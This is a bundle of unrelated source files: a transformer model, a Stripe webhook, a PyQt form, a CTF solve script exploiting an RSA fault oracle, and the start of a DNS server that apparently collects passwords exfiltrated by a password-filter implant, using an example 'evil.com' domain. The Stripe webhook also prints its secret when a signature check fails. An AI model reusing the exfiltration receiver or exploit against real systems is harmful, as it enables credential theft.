26e9eb2c9fc487507d5a6f6860bffd2bec7a7407 | 6772366c837db17c2a948aad91d53227d566fea0 | /src/qt.py | 92edf341ac72103120e0fe5d6106d9244302fa81 | [
"MIT"
] | permissive | stangelid/qt | c0ede36e48cedda22f9f8e627ad9d3ef20eb895b | c136ac00e03adf443b90cd65ba0523a3617be01f | refs/heads/main | 2023-06-19T00:23:53.618522 | 2021-07-14T09:47:21 | 2021-07-14T09:47:21 | 318,196,432 | 37 | 8 | null | null | null | null | UTF-8 | Python | false | false | 8,284 | py | import torch
import torch.nn as nn
from utils.data import *
from encoders import *
from quantizers import *
class QuantizedTransformerModel(nn.Module):
def __init__(self,
vocab_size: int,
d_model: int = 320,
codebook_size: int = 1024,
commitment_cost: float = 1.00,
ema_decay: float = 0.99,
temp: float = 1.0,
num_samples: int = 10,
epsilon: float = 1e-5,
nlayers: int = 3,
internal_nheads: int = 4,
output_nheads: int = 8,
d_ff: int = 512,
dropout: float = 0.1,
use_in_pos: bool = False,
use_out_pos: bool = False,
padding_idx: int = 0,
unk_idx: int = 1,
bos_idx: int = 2,
eos_idx: int = 3):
super(QuantizedTransformerModel, self).__init__()
self.vocab_size = vocab_size
self.d_model = d_model
self.codebook_size = codebook_size
self.use_in_pos = use_in_pos
self.use_out_pos = use_out_pos
self.padding_idx = padding_idx
self.unk_idx = unk_idx
self.bos_idx = bos_idx
self.eos_idx = eos_idx
self.in_emb = nn.Embedding(vocab_size, d_model, padding_idx=padding_idx)
self.out_emb = self.in_emb
if use_in_pos:
self.in_pos = PositionalDocumentEncoding(d_model, dropout)
if use_out_pos:
self.out_pos = self.in_pos
elif use_out_pos:
self.out_pos = PositionalDocumentEncoding(d_model, dropout)
self.encoder = TransformerDocumentQuantizerSoftEMA(
codebook_size=codebook_size,
d_model=d_model,
temp=temp,
num_samples=num_samples,
commitment_cost=commitment_cost,
ema_decay=ema_decay,
epsilon=epsilon,
nlayers=nlayers,
internal_nheads=internal_nheads,
output_nheads=output_nheads,
d_ff=d_ff,
dropout=dropout)
decoder_layer = nn.TransformerDecoderLayer(
d_model,
internal_nheads,
dim_feedforward=d_ff,
dropout=dropout)
self.decoder = nn.TransformerDecoder(
decoder_layer,
nlayers,
norm=nn.LayerNorm(d_model))
self.linear = nn.Linear(self.d_model,
self.vocab_size)
def in_embed(self, src):
emb = self.in_emb(src)
if self.use_in_pos:
emb = self.in_pos(emb)
return emb
def out_embed(self, tgt):
emb = self.out_emb(tgt)
if self.use_out_pos:
emb = self.out_pos(emb)
return emb
def encode(self, src, quantize=True, residual_coeff=0.0):
assert src.dim() == 3, 'Input (source) must be 3-dimensional [B x S x T]'
batch_size, nsent, ntokens = src.size()
device = src.device
sent_tokens = torch.ones(batch_size, nsent, 1).long() * self.unk_idx
sent_tokens = sent_tokens.to(device)
src = torch.cat([sent_tokens, src], dim=2)
if self.padding_idx is not None:
padding_mask = self.get_padding_mask(src)
src_emb = self.in_embed(src)
quantized_memory, encodings, q_loss, perplexity = \
self.encoder(src_emb, padding_mask=padding_mask, \
quantize=quantize, residual_coeff=residual_coeff)
return quantized_memory, encodings, q_loss, perplexity
def decode(self, tgt, memory, memory_mask=None,
memory_key_padding_mask=None):
assert tgt.dim() == 3, 'Input (target) must be 3-dimensional [B x S x T]'
assert memory.dim() == 4, 'Input (memory) must be 4-dimensional [B x S x MT x E]'
device = tgt.device
batch_size, nsent, ntokens = tgt.size()
mem_batch_size, mem_nsent, mem_ntokens, mem_emb_size = memory.size()
assert batch_size == mem_batch_size \
and nsent == mem_nsent \
and mem_emb_size == self.d_model, \
'Target, memory and model dimensionalities don\'t match'
tgt_emb = self.out_embed(tgt).reshape(batch_size * nsent, ntokens, -1).transpose(0, 1)
tgt = tgt.reshape(batch_size * nsent, ntokens)
tgt_mask = generate_square_subsequent_mask(ntokens).to(device)
if self.padding_idx is not None:
tgt_key_padding_mask = self.get_padding_mask(tgt)
memory = memory.reshape(mem_batch_size * mem_nsent, mem_ntokens, mem_emb_size).transpose(0, 1)
if memory_key_padding_mask is not None:
memory_key_padding_mask = \
memory_key_padding_mask.reshape(mem_batch_size * mem_nsent, mem_ntokens)
output = self.decoder(
tgt_emb,
memory,
tgt_mask=tgt_mask,
memory_mask=memory_mask,
tgt_key_padding_mask=tgt_key_padding_mask,
memory_key_padding_mask=memory_key_padding_mask)
return output.transpose(0, 1).reshape(batch_size, nsent, ntokens, -1)
def forward(self, src, tgt, quantize=True, residual_coeff=0.0):
src_batch_size, src_nsent, src_ntokens = src.size()
tgt_batch_size, tgt_nsent, tgt_ntokens = tgt.size()
assert src_batch_size == tgt_batch_size and src_nsent == tgt_nsent, \
'Size mismath between source and target'
memory, encodings, q_loss, perplexity = \
self.encode(src, quantize=quantize, residual_coeff=residual_coeff)
out = self.decode(tgt, memory)
return self.linear(out), encodings, q_loss, perplexity
def generate(self, src, maxlen=40, quantize=True, residual_coeff=0.0):
assert src.dim() == 3, 'Input (source) must be 3-dimensional'
batch_size, nsent, ntokens = src.size()
device = src.device
memory, encodings, q_loss, perplexity = \
self.encode(src, quantize=quantize, residual_coeff=residual_coeff)
# <BOS> tgt seq for generation
tgt = torch.LongTensor(batch_size, nsent, maxlen).fill_(self.padding_idx).to(device)
tgt[:,:,0] = self.bos_idx
for i in range(1, maxlen):
out = self.decode(tgt[:,:,:i], memory)
prob = self.linear(out)
decode_output = prob.argmax(dim=-1)
tgt[:,:,i] = decode_output[:,:,-1]
return tgt, encodings
def cluster(self, src):
assert src.dim() == 3, 'Input (source) must be 3-dimensional [B x S x T]'
batch_size, nsent, ntokens = src.size()
device = src.device
sent_tokens = torch.ones(batch_size, nsent, 1).long() * self.unk_idx
sent_tokens = sent_tokens.to(device)
src = torch.cat([sent_tokens, src], dim=2)
if self.padding_idx is not None:
padding_mask = self.get_padding_mask(src)
src_emb = self.in_embed(src)
noq_out, q_out, clusters, distances = \
self.encoder.cluster(src_emb, padding_mask=padding_mask)
return noq_out, q_out, clusters, distances
def get_padding_mask(self, batch):
return batch == self.padding_idx
def get_tgt_inputs(self, batch):
batch_size, nsent, ntokens = batch.size()
bos = torch.ones(batch_size, nsent, 1).long().to(device) * self.bos_idx
return torch.cat([bos, batch], dim=2)
def generate_square_subsequent_mask(sz):
"""Generate a square mask for the sequence. The masked positions are filled with float('-inf').
Unmasked positions are filled with float(0.0).
"""
mask = (torch.triu(torch.ones(sz, sz)) == 1).transpose(0, 1)
mask = mask.float().masked_fill(mask == 0, float('-inf')).masked_fill(mask == 1, float(0.0))
return mask
| [
"stangelid@gmail.com"
] | stangelid@gmail.com |
ec2677dd7b4db844448b927264567f35f884aff1 | 89bfa644209978bd36e41cc3e89278f7f48ef6ad | /checkout/webhooks.py | 02ed2bb7bd730d7989438e590158462583081d0a | [] | no_license | Code-Institute-Submissions/usupplement | 472f9ff9e324c6c003b7a39dad67f115cc461901 | 07641acd48d4505e18bf32d306149429068659f3 | refs/heads/master | 2023-01-04T05:49:58.887080 | 2020-10-31T09:31:21 | 2020-10-31T09:31:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,945 | py | from django.conf import settings
from django.http import HttpResponse
from django.views.decorators.http import require_POST
from django.views.decorators.csrf import csrf_exempt
from checkout.webhook_handler import StripeWH_Handler
import stripe
# Code copied from stripe and Code Institute
@require_POST
@csrf_exempt
def webhook(request):
"""Listen for webhooks from Stripe"""
# Setup
wh_secret = settings.STRIPE_WH_SECRET
stripe.api_key = settings.STRIPE_SECRET_KEY
# Get the webhook data and verify its signature
payload = request.body
sig_header = request.META['HTTP_STRIPE_SIGNATURE']
event = None
try:
event = stripe.Webhook.construct_event(
payload, sig_header, wh_secret
)
except ValueError as e:
# Invalid payload
return HttpResponse(status=400)
except stripe.error.SignatureVerificationError as e:
# Invalid signature
print(wh_secret)
return HttpResponse(status=400)
except Exception as e:
return HttpResponse(content=e, status=400)
# Code from Code Institute
# Set up a webhook handler
handler = StripeWH_Handler(request)
# and the values will be the actual methods inside the handler
event_map = {
'payment_intent.succeeded': handler.handle_payment_intent_succeeded,
'payment_intent.payment_failed': handler.handle_payment_intent_payment_failed,
}
# Get the webhook type from Stripe
event_type = event['type']
# Once we get the type we look it up in the key dictionary and assign it to a variable
# If there's a handler for it, get it from the event map
# Use the generic one by default
event_handler = event_map.get(event_type, handler.handle_event)
# envent_handler is just an alias for whatever function we pulled out of the dictionary
# Call the event handler with the event
response = event_handler(event)
return response
| [
"anders242@gmail.com"
] | anders242@gmail.com |
30a67b43ff15c63df374ecddfa271a40a3dfbe02 | d0c3335fa6979c5977981998a563627318bbf247 | /fault/sol.py | 3e2f14f3795b75005adbe348fb0e7685170b36cb | [] | no_license | incertia/csaw-quals-2019 | 83e5906f6cb80d2c88d2078c7e66d83a19d4bb90 | a68f652efa4cd444ea152e679b73422223a77874 | refs/heads/master | 2020-07-27T06:33:29.494246 | 2019-09-16T21:43:05 | 2019-09-16T21:43:05 | 208,903,459 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,113 | py | #! /usr/bin/env python2
from fault import *
from pwn import *
from gmpy2 import *
from Crypto.Util.number import GCD
import time
def menu(r):
for _ in xrange(8):
r.recvline()
#r = remote("localhost", 23333)
r = remote("crypto.chal.csaw.io", 1001)
R = RSA()
e = 0x10001
menu(r)
r.sendline('3')
c1 = int(r.recvline().strip(), 16)
# get N, or rather, a multiple of it
menu(r)
r.sendline('4')
r.recvuntil("input the data:")
r.sendline("\x02")
x1 = int(r.recvline().strip(), 16)
r.sendline('4')
r.recvuntil("input the data:")
r.sendline("\x03")
x2 = int(r.recvline().strip(), 16)
N = GCD(pow(s2n("\x02"), e) - x1, pow(s2n("\x03"), e) - x2)
y = 0
p = 0
q = 0
while True:
fake_flag = 'fake_flag{%s}' % (('%X' % y).rjust(32, '0'))
menu(r)
r.sendline('4')
r.recvuntil("input the data:")
r.sendline(fake_flag)
c2 = int(r.recvline().strip(), 16)
g = GCD(c1 - c2, N)
if g != 1:
assert is_prime(g)
p = g
q = N // p
R.generate(p, q)
break
y += 1
menu(r)
r.sendline('1')
c = int(r.recvline().strip(), 16)
print(n2s(R.decrypt(c)))
| [
"incertia@incertia.net"
] | incertia@incertia.net |
5721b85535ca393d3618d0287f79207cb73bf3d3 | 3b2a766682caa36a38ef7f85b9915096b0f47278 | /uiview/ui_updateCustomer.py | 2efe227e8971c350d7f61065429ab3e152aaec8d | [] | no_license | himalsaman/kmfmaintenance | 0d8252faaf749620628493a876cd759c3a6b8ed4 | 26d153bfa90b97da9f378d50a025f2660646435f | refs/heads/master | 2020-12-24T12:04:48.875927 | 2016-12-20T07:41:59 | 2016-12-20T07:41:59 | 73,080,044 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,785 | py | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'ui_updateCustomer.ui'
#
# Created by: PyQt5 UI code generator 5.6
#
# WARNING! All changes made in this file will be lost!
import sys
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QIntValidator
from PyQt5.QtWidgets import QDialog
from Control.userControl import getLoginDataPKL
from models import cityModel
from models.cityModel import select_city_by_id
from models.customersModel import select_customer_by_mob_num, update_customer
class Ui_updateCustomer(QDialog):
def __init__(self, parent=None):
super(Ui_updateCustomer, self).__init__()
self.setupUi(self)
    def setupUi(self, updateCustomer):
        """Build and wire all widgets of the 'Update Customer' dialog.

        Layout (as laid out by the geometry literals below):
          * top strip  - "Welcome, <user>" banner plus a search bar
            (mobile number + Search button);
          * left half  - read-only red labels showing the currently stored
            customer values (filled in by ``searchCustomer``);
          * right half - editable fields for the new values plus
            Save / Cancel buttons.

        Args:
            updateCustomer: The dialog widget to populate (in practice this
                is ``self`` — see ``__init__``).
        """
        # Strip the native close button so the user must leave via Cancel.
        self.setWindowFlags(self.windowFlags() & ~QtCore.Qt.WindowCloseButtonHint)
        updateCustomer.setObjectName("updateCustomer")
        updateCustomer.resize(683, 390)
        # --- banner: "Welcome, <logged-in user>" -------------------------
        self.label = QtWidgets.QLabel(updateCustomer)
        self.label.setGeometry(QtCore.QRect(10, 10, 47, 16))
        self.label.setObjectName("label")
        self.loggeduserlbl = QtWidgets.QLabel(updateCustomer)
        self.loggeduserlbl.setGeometry(QtCore.QRect(60, 10, 191, 16))
        font = QtGui.QFont()
        font.setBold(True)
        font.setWeight(75)
        self.loggeduserlbl.setFont(font)
        self.loggeduserlbl.setText("")
        self.loggeduserlbl.setObjectName("loggeduserlbl")
        # Name of the currently logged-in user, read from the login pickle.
        self.loggeduserlbl.setText(getLoginDataPKL()['name'])
        # Horizontal separator under the banner.
        self.line = QtWidgets.QFrame(updateCustomer)
        self.line.setGeometry(QtCore.QRect(5, 27, 671, 16))
        self.line.setFrameShape(QtWidgets.QFrame.HLine)
        self.line.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line.setObjectName("line")
        # --- right column: editable "new value" inputs -------------------
        self.custnameled = QtWidgets.QLineEdit(updateCustomer)
        self.custnameled.setGeometry(QtCore.QRect(404, 44, 261, 20))
        self.custnameled.setObjectName("custnameled")
        # Primary mobile number plus four optional extra numbers.
        self.mobcustled = QtWidgets.QLineEdit(updateCustomer)
        self.mobcustled.setGeometry(QtCore.QRect(404, 70, 191, 20))
        self.mobcustled.setObjectName("mobcustled")
        self.mobcustled91 = QtWidgets.QLineEdit(updateCustomer)
        self.mobcustled91.setGeometry(QtCore.QRect(404, 100, 191, 20))
        self.mobcustled91.setObjectName("mobcustled91")
        self.mobcustled92 = QtWidgets.QLineEdit(updateCustomer)
        self.mobcustled92.setGeometry(QtCore.QRect(404, 130, 191, 20))
        self.mobcustled92.setObjectName("mobcustled92")
        self.mobcustled93 = QtWidgets.QLineEdit(updateCustomer)
        self.mobcustled93.setGeometry(QtCore.QRect(404, 160, 191, 20))
        self.mobcustled93.setObjectName("mobcustled93")
        self.mobcustled94 = QtWidgets.QLineEdit(updateCustomer)
        self.mobcustled94.setGeometry(QtCore.QRect(404, 190, 191, 20))
        self.mobcustled94.setObjectName("mobcustled94")
        # City drop-down: blank sentinel entry (userData 0) followed by all
        # cities from the database, with the city id stored as item data.
        self.citycmbx = QtWidgets.QComboBox(updateCustomer)
        self.citycmbx.setGeometry(QtCore.QRect(401, 220, 171, 22))
        self.citycmbx.setObjectName("citycmbx")
        self.citycmbx.addItem("", 0)
        for city in cityModel.select_all_cities():
            self.citycmbx.addItem(city.name, city.id)
        self.agespin = QtWidgets.QSpinBox(updateCustomer)
        self.agespin.setGeometry(QtCore.QRect(404, 250, 81, 22))
        self.agespin.setObjectName("agespin")
        # Gender radio buttons grouped so they are mutually exclusive.
        self.groupBox = QtWidgets.QGroupBox(updateCustomer)
        self.groupBox.setGeometry(QtCore.QRect(404, 280, 191, 41))
        self.groupBox.setTitle("")
        self.groupBox.setObjectName("groupBox")
        self.horizontalLayoutWidget = QtWidgets.QWidget(self.groupBox)
        self.horizontalLayoutWidget.setGeometry(QtCore.QRect(5, 2, 181, 31))
        self.horizontalLayoutWidget.setObjectName("horizontalLayoutWidget")
        self.horizontalLayout = QtWidgets.QHBoxLayout(self.horizontalLayoutWidget)
        self.horizontalLayout.setContentsMargins(0, 0, 0, 0)
        self.horizontalLayout.setObjectName("horizontalLayout")
        self.malebtn = QtWidgets.QRadioButton(self.horizontalLayoutWidget)
        self.malebtn.setObjectName("malebtn")
        self.horizontalLayout.addWidget(self.malebtn)
        self.femalerbtn = QtWidgets.QRadioButton(self.horizontalLayoutWidget)
        self.femalerbtn.setObjectName("femalerbtn")
        self.horizontalLayout.addWidget(self.femalerbtn)
        # Save button triggers the update; method is defined further down
        # the class (outside this view).
        self.updatebtn = QtWidgets.QPushButton(updateCustomer)
        self.updatebtn.setGeometry(QtCore.QRect(435, 350, 75, 31))
        self.updatebtn.setObjectName("updatebtn")
        self.updatebtn.clicked.connect(self.updateCustomer)
        self.cancelbtn = QtWidgets.QPushButton(updateCustomer)
        self.cancelbtn.setGeometry(QtCore.QRect(555, 350, 75, 31))
        self.cancelbtn.setObjectName("cancelbtn")
        self.cancelbtn.clicked.connect(self.close)
        # Status / error message area (red text), bottom-left.
        self.statuslbl = QtWidgets.QLabel(updateCustomer)
        self.statuslbl.setGeometry(QtCore.QRect(10, 345, 331, 31))
        self.statuslbl.setStyleSheet("color: rgb(255, 0, 0);")
        self.statuslbl.setText("")
        self.statuslbl.setAlignment(QtCore.Qt.AlignCenter)
        self.statuslbl.setObjectName("statuslbl")
        # --- right column: static field captions (Name, Mobile #, ...) ---
        self.layoutWidget = QtWidgets.QWidget(updateCustomer)
        self.layoutWidget.setGeometry(QtCore.QRect(350, 38, 51, 265))
        self.layoutWidget.setObjectName("layoutWidget")
        self.verticalLayout = QtWidgets.QVBoxLayout(self.layoutWidget)
        self.verticalLayout.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout.setObjectName("verticalLayout")
        self.label_3 = QtWidgets.QLabel(self.layoutWidget)
        self.label_3.setObjectName("label_3")
        self.verticalLayout.addWidget(self.label_3)
        self.label_4 = QtWidgets.QLabel(self.layoutWidget)
        self.label_4.setObjectName("label_4")
        self.verticalLayout.addWidget(self.label_4)
        self.label_41 = QtWidgets.QLabel(self.layoutWidget)
        self.label_41.setObjectName("label_41")
        self.verticalLayout.addWidget(self.label_41)
        self.label_42 = QtWidgets.QLabel(self.layoutWidget)
        self.label_42.setObjectName("label_42")
        self.verticalLayout.addWidget(self.label_42)
        self.label_43 = QtWidgets.QLabel(self.layoutWidget)
        self.label_43.setObjectName("label_43")
        self.verticalLayout.addWidget(self.label_43)
        self.label_44 = QtWidgets.QLabel(self.layoutWidget)
        self.label_44.setObjectName("label_44")
        self.verticalLayout.addWidget(self.label_44)
        self.label_7 = QtWidgets.QLabel(self.layoutWidget)
        self.label_7.setObjectName("label_7")
        self.verticalLayout.addWidget(self.label_7)
        self.label_6 = QtWidgets.QLabel(self.layoutWidget)
        self.label_6.setObjectName("label_6")
        self.verticalLayout.addWidget(self.label_6)
        self.label_5 = QtWidgets.QLabel(self.layoutWidget)
        self.label_5.setObjectName("label_5")
        self.verticalLayout.addWidget(self.label_5)
        # Vertical separator between the two halves of the form.
        self.line_2 = QtWidgets.QFrame(updateCustomer)
        self.line_2.setGeometry(QtCore.QRect(333, 40, 20, 340))
        self.line_2.setFrameShape(QtWidgets.QFrame.VLine)
        self.line_2.setFrameShadow(QtWidgets.QFrame.Sunken)
        self.line_2.setObjectName("line_2")
        # --- left column: static captions for the current stored values --
        self.layoutWidget_2 = QtWidgets.QWidget(updateCustomer)
        self.layoutWidget_2.setGeometry(QtCore.QRect(10, 88, 70, 251))
        self.layoutWidget_2.setObjectName("layoutWidget_2")
        self.verticalLayout_2 = QtWidgets.QVBoxLayout(self.layoutWidget_2)
        self.verticalLayout_2.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_2.setObjectName("verticalLayout_2")
        self.label_8 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_8.setObjectName("label_8")
        self.verticalLayout_2.addWidget(self.label_8)
        self.label_9 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_9.setObjectName("label_9")
        self.verticalLayout_2.addWidget(self.label_9)
        self.label_91 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_91.setObjectName("label_91")
        self.verticalLayout_2.addWidget(self.label_91)
        self.label_92 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_92.setObjectName("label_92")
        self.verticalLayout_2.addWidget(self.label_92)
        self.label_93 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_93.setObjectName("label_93")
        self.verticalLayout_2.addWidget(self.label_93)
        self.label_94 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_94.setObjectName("label_94")
        self.verticalLayout_2.addWidget(self.label_94)
        self.label_10 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_10.setObjectName("label_10")
        self.verticalLayout_2.addWidget(self.label_10)
        self.label_11 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_11.setObjectName("label_11")
        self.verticalLayout_2.addWidget(self.label_11)
        self.label_12 = QtWidgets.QLabel(self.layoutWidget_2)
        self.label_12.setObjectName("label_12")
        self.verticalLayout_2.addWidget(self.label_12)
        # --- left column: red value labels (re* = "read"/current values),
        # populated by searchCustomer after a successful lookup. -----------
        self.layoutWidget_3 = QtWidgets.QWidget(updateCustomer)
        self.layoutWidget_3.setGeometry(QtCore.QRect(90, 88, 271, 251))
        self.layoutWidget_3.setObjectName("layoutWidget_3")
        self.layoutWidget_3.setStyleSheet("color: rgb(255, 0, 0);")
        self.verticalLayout_3 = QtWidgets.QVBoxLayout(self.layoutWidget_3)
        self.verticalLayout_3.setContentsMargins(0, 0, 0, 0)
        self.verticalLayout_3.setObjectName("verticalLayout_3")
        self.renamelbl = QtWidgets.QLabel(self.layoutWidget_3)
        self.renamelbl.setText("")
        self.renamelbl.setObjectName("renamelbl")
        self.verticalLayout_3.addWidget(self.renamelbl)
        self.remobilenumlbl = QtWidgets.QLabel(self.layoutWidget_3)
        self.remobilenumlbl.setText("")
        self.remobilenumlbl.setObjectName("remobilenumlbl")
        self.verticalLayout_3.addWidget(self.remobilenumlbl)
        self.remobilenumlbl91 = QtWidgets.QLabel(self.layoutWidget_3)
        self.remobilenumlbl91.setText("")
        self.remobilenumlbl91.setObjectName("remobilenumlbl91")
        self.verticalLayout_3.addWidget(self.remobilenumlbl91)
        self.remobilenumlbl92 = QtWidgets.QLabel(self.layoutWidget_3)
        self.remobilenumlbl92.setText("")
        self.remobilenumlbl92.setObjectName("remobilenumlbl92")
        self.verticalLayout_3.addWidget(self.remobilenumlbl92)
        self.remobilenumlbl93 = QtWidgets.QLabel(self.layoutWidget_3)
        self.remobilenumlbl93.setText("")
        self.remobilenumlbl93.setObjectName("remobilenumlbl93")
        self.verticalLayout_3.addWidget(self.remobilenumlbl93)
        self.remobilenumlbl94 = QtWidgets.QLabel(self.layoutWidget_3)
        self.remobilenumlbl94.setText("")
        self.remobilenumlbl94.setObjectName("remobilenumlbl94")
        self.verticalLayout_3.addWidget(self.remobilenumlbl94)
        self.recitylbl = QtWidgets.QLabel(self.layoutWidget_3)
        self.recitylbl.setText("")
        self.recitylbl.setObjectName("recitylbl")
        self.verticalLayout_3.addWidget(self.recitylbl)
        self.reagelbl = QtWidgets.QLabel(self.layoutWidget_3)
        self.reagelbl.setText("")
        self.reagelbl.setObjectName("reagelbl")
        self.verticalLayout_3.addWidget(self.reagelbl)
        self.regenderlbl = QtWidgets.QLabel(self.layoutWidget_3)
        self.regenderlbl.setText("")
        self.regenderlbl.setObjectName("regenderlbl")
        self.verticalLayout_3.addWidget(self.regenderlbl)
        # --- search bar: mobile-number lookup ----------------------------
        self.searchButton = QtWidgets.QPushButton(updateCustomer)
        self.searchButton.setGeometry(QtCore.QRect(272, 45, 61, 31))
        self.searchButton.setObjectName("searchButton")
        # NOTE(review): this validator restricts the *new* mobile field
        # (mobcustled), not the search field — searchled accepts any text.
        self.mobcustled.setValidator(QIntValidator())
        self.searchButton.clicked.connect(self.searchCustomer)
        self.searchled = QtWidgets.QLineEdit(updateCustomer)
        self.searchled.setGeometry(QtCore.QRect(74, 51, 191, 20))
        self.searchled.setObjectName("searchled")
        self.label_2 = QtWidgets.QLabel(updateCustomer)
        self.label_2.setGeometry(QtCore.QRect(20, 54, 47, 13))
        self.label_2.setObjectName("label_2")
        # Apply display strings, then auto-connect any by-name slots.
        self.retranslateUi(updateCustomer)
        QtCore.QMetaObject.connectSlotsByName(updateCustomer)
    def retranslateUi(self, updateCustomer):
        """Set all user-visible strings on the form (Qt Designer-generated).

        Called once from setupUi; every string is routed through
        QCoreApplication.translate so the UI can be localised.
        """
        _translate = QtCore.QCoreApplication.translate
        updateCustomer.setWindowTitle(_translate("updateCustomer", "Update Customer"))
        self.label.setText(_translate("updateCustomer", "Welcome, "))
        self.malebtn.setText(_translate("updateCustomer", "Male"))
        self.femalerbtn.setText(_translate("updateCustomer", "Female"))
        self.updatebtn.setText(_translate("updateCustomer", "Save"))
        self.cancelbtn.setText(_translate("updateCustomer", "Cancel"))
        # Labels for the editable (left) column.
        self.label_3.setText(_translate("updateCustomer", "Name:"))
        self.label_4.setText(_translate("updateCustomer", "Mobile # :"))
        self.label_41.setText(_translate("updateCustomer", "Mobile 1 # :"))
        self.label_42.setText(_translate("updateCustomer", "Mobile 2 # :"))
        self.label_43.setText(_translate("updateCustomer", "Mobile 3 # :"))
        self.label_44.setText(_translate("updateCustomer", "Mobile 4 # :"))
        self.label_7.setText(_translate("updateCustomer", "City :"))
        self.label_6.setText(_translate("updateCustomer", "Age :"))
        self.label_5.setText(_translate("updateCustomer", "Gender :"))
        # Labels for the read-only "current values" (right) column.
        self.label_8.setText(_translate("updateCustomer", "Name:"))
        self.label_9.setText(_translate("updateCustomer", "M. Mobile # :"))
        self.label_91.setText(_translate("updateCustomer", "M. Mobile 1 # :"))
        self.label_92.setText(_translate("updateCustomer", "M. Mobile 2 # :"))
        self.label_93.setText(_translate("updateCustomer", "M. Mobile 3 # :"))
        self.label_94.setText(_translate("updateCustomer", "M. Mobile 4 # :"))
        self.label_10.setText(_translate("updateCustomer", "City :"))
        self.label_11.setText(_translate("updateCustomer", "Age :"))
        self.label_12.setText(_translate("updateCustomer", "Gender :"))
        self.searchButton.setText(_translate("updateCustomer", "Search"))
        self.label_2.setText(_translate("updateCustomer", "Mobile #"))
def searchCustomer(self):
mob_num = self.searchled.text()
if mob_num == '':
self.statuslbl.setText('Must enter mobilephone to start search')
elif select_customer_by_mob_num(mob_num):
selectedCust = select_customer_by_mob_num(mob_num)
self.renamelbl.setText(selectedCust.name)
self.custnameled.setText(selectedCust.name)
self.remobilenumlbl.setText(selectedCust.mobile_number)
self.remobilenumlbl91.setText(selectedCust.mobile_number_1)
self.remobilenumlbl92.setText(selectedCust.mobile_number_2)
self.remobilenumlbl93.setText(selectedCust.mobile_number_3)
self.remobilenumlbl94.setText(selectedCust.mobile_number_4)
self.mobcustled.setText(selectedCust.mobile_number)
self.mobcustled91.setText(selectedCust.mobile_number_1)
self.mobcustled92.setText(selectedCust.mobile_number_2)
self.mobcustled93.setText(selectedCust.mobile_number_3)
self.mobcustled94.setText(selectedCust.mobile_number_4)
city = select_city_by_id(selectedCust.city_id)
self.recitylbl.setText(city.name)
self.citycmbx.setCurrentText(city.name)
self.reagelbl.setText(str(selectedCust.age))
self.agespin.setValue(selectedCust.age)
self.regenderlbl.setText(selectedCust.gender.capitalize())
if selectedCust.gender == 'male':
self.malebtn.setChecked(True)
else:
self.femalerbtn.setChecked(True)
self.statuslbl.setText('')
else:
self.statuslbl.setText("Can't found customer")
def updateCustomer(self):
if select_customer_by_mob_num(self.searchled.text()) and self.mobcustled.text() != '' or \
self.remobilenumlbl.text() != '':
selectedCust = select_customer_by_mob_num(self.searchled.text())
custname = self.custnameled.text()
custmobnum = self.mobcustled.text()
custmobnum1 = self.mobcustled91.text()
custmobnum2 = self.mobcustled92.text()
custmobnum3 = self.mobcustled93.text()
custmobnum4 = self.mobcustled94.text()
custcity_id = self.citycmbx.currentIndex()
custage = self.agespin.text()
if self.malebtn.isChecked():
gndr = 'male'
elif self.femalerbtn.isChecked():
gndr = 'female'
if custname:
custname = self.renamelbl.text()
if not custmobnum:
custmobnum = self.remobilenumlbl.text()
if self.citycmbx.currentIndex() == 0:
custcity_id = selectedCust.city_id
if self.agespin.value() == 0:
custage = self.reagelbl.text()
if not self.malebtn.isChecked() | self.femalerbtn.isChecked():
gndr = self.regenderlbl.text()
update_customer(selectedCust.id, custname, custmobnum, custmobnum1, custmobnum2, custmobnum3,
custmobnum4, gndr, custage, custcity_id)
self.close()
else:
self.statuslbl.setText("No Customer To Update")
# if __name__ == "__main__":
# app = QtWidgets.QApplication(sys.argv)
# myapp = Ui_updateCustomer()
# myapp.show()
# app.exec_()
| [
"himalsaman@gmail.com"
] | himalsaman@gmail.com |
3869e363dfb5a60c769b43bd5937dc6ddec3b944 | ee78740ee10a5bd1089854dd49c81e0bec02b406 | /scripts/dns.py | dd615f9c04aa2fecc611ea073ca9eacaa1d5d98a | [
"MIT"
] | permissive | fengjixuchui/DLLPasswordFilterImplant | 09096aaf599a70fb0c4666c162c2bd26231d70fe | 1ed6b088163a8e7752f71512b655a172b5f75972 | refs/heads/master | 2021-02-09T22:06:17.614418 | 2020-02-24T18:15:18 | 2020-02-24T18:15:18 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,686 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import re
from math import ceil
import time
from dnslib import RR,QTYPE,RCODE,TXT,parse_time
from dnslib.label import DNSLabel
from dnslib.server import DNSServer,DNSHandler,BaseResolver,DNSLogger
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_OAEP
# Expected query-name format: "<decimal chunk index>.<hex-encoded data>.<domain>".
SYNTAX = re.compile(r'(\d+)\.([a-fA-F0-9]+)\..*')
MAX_LABEL_SIZE = 62 # Should match define in passwordFilter.c
class ExfilResolver(BaseResolver):
    """
    A DNS resolver that always replies with an empty record, but keeps track of
    encrypted chunks and dumps decrypted blocks.
    The chunks are formatted according to the `SYNTAX` regular expression, that is:
    <index>.<data>.domain.name.tld
    For example, `01.85437de3829bc[...]432f.dns.evil.com`
    The server will compute the expected number of chunks based on the private
    key length automatically.
    Currently, the server does not support concurrent requests, in the off chance that
    two password changes occur simultaneously. This could be implemented in two ways:
    1. Cluster chunks by time intervals. This can still fail if two resets
    happen in very close succession.
    2. Add an additional label on the domain that contains a block
    identifier. This requires changing the implant code and updating the
    Empire module.
    FIXME: Group by time proximity to avoid interleaving?
